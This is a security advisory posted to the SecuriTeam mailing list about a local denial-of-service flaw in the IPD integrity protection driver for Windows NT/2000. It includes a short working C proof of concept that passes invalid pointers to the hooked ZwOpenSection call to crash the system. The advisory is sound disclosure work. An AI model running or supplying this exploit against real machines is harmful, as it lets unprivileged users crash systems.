The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
IPD Local System Denial of Service
------------------------------------------------------------------------
SUMMARY
The <http://www.pedestalsoftware.com/> IPD (Integrity protection driver)
is "an Open Source device driver designed to prohibit the installation of
new services and drivers and to protect existing driver from tampering. It
installs on Windows NT and Windows 2000 computers".
In its security approach IPD hooks some kernel mode functions and filters
them allowing or not their original purposes based on IPD's security
policy.
IPD suffers from an invalidated pointer referencing in some of this kernel
hooks.
DETAILS
Vulnerable Systems:
* IPD versions up to 1.4
Technical description:
The IPD (Integrity protection driver) is an Open Source device driver
designed to prohibit the installation of new services and drivers and to
protect existing driver from tampering. It installs on Windows NT and
Windows 2000 computers.
In its security approach IPD hooks some kernel mode functions and filters
them allowing or not their original purposes based on IPD's security
policy.
IPD suffers from some invalidated pointer referencing in some of this
kernel hooks. In example IPD hooks ZwOpenSection declared as follows:
NTSTATUS ZwOpenSection(HANDLE Handle, DWORD mask, DWORD oa);
The problem exists because IPD does not properly check whether "oa"
pointer is valid or not. Any local and unauthorized user can crash the.
Recommendations:
Since the vendor has discontinued the development and support of IPD,
NGSEC recomends to uninstall IPD.
Exploit:
/*
* ipd-dos.c
*
* Copyright (c) 2002-2004 By Next Generation Security S.L.
* All rights reserved
*
* Compiles with: cl ipd-dos.c
*
* Madrid, August 2004
*/
#include <windows.h>
#define MY_NULL 0x01
typedef DWORD (* zwopensection_TYPE)(DWORD Handle, DWORD mask, DWORD oa);
int main(int argc, char *argv[]) {
HINSTANCE dll;
zwopensection_TYPE my_ZwOpenSection;
if ((dll=LoadLibrary("ntdll.dll"))!=NULL) {
if
((my_ZwOpenSection=(zwopensection_TYPE)GetProcAddress(dll,"ZwOpenSection"))!=NULL)
{
my_ZwOpenSection(MY_NULL,MY_NULL,MY_NULL);
}
}
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:fjserna@ngsec.com> Ferm n J.
Serna.
The original article can be found at:
<http://www.ngsec.com/docs/advisories/NGSEC-2004-6.txt>
http://www.ngsec.com/docs/advisories/NGSEC-2004-6.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
